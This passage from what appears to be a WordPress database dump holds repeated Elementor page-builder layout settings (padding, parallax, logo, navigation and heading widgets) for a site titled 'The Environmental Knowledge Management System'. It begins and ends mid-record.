",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"70\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2911,368,'_elementor_version','2.7.5'),(2912,368,'_elementor_template_type','wp-post'),(2916,369,'_wp_page_template','elementor_canvas'),(2917,369,'_elementor_edit_mode','builder'),(2918,369,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"70\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":15.309,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":54.7,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":29.987,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"70\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2919,369,'_elementor_version','2.7.5'),(2920,369,'_elementor_template_type','wp-post'),(2931,372,'_wp_page_template','elementor_canvas'),(2932,372,'_elementor_edit_mode','builder'),(2933,372,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":15.309,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":54.7,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":29.987,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2934,372,'_elementor_version','2.7.5'),(2935,372,'_elementor_template_type','wp-post'),(2939,373,'_wp_page_template','elementor_canvas'),(2940,373,'_elementor_edit_mode','builder'),(2941,373,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2942,373,'_elementor_version','2.7.5'),(2943,373,'_elementor_template_type','wp-post'),(2947,374,'_wp_page_template','elementor_canvas'),(2948,374,'_elementor_edit_mode','builder'),(2949,374,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2950,374,'_elementor_version','2.7.5'),(2951,374,'_elementor_template_type','wp-post'),(2986,384,'_wp_page_template','elementor_canvas'),(2987,384,'_elementor_edit_mode','builder'),(2988,384,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"rgba(0,0,0,0.62)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.86,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2989,384,'_elementor_version','2.7.5'),(2990,384,'_elementor_template_type','wp-post'),(3035,9,'_edit_lock','1686916811:42'),(3042,9,'_elementor_template_type','wp-page'),(3043,392,'_elementor_controls_usage','a:0:{}'),(3044,392,'_wp_page_template','default'),(3045,392,'_elementor_edit_mode','builder'),(3046,392,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_247786.jpg\",\"id\":148},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Need a 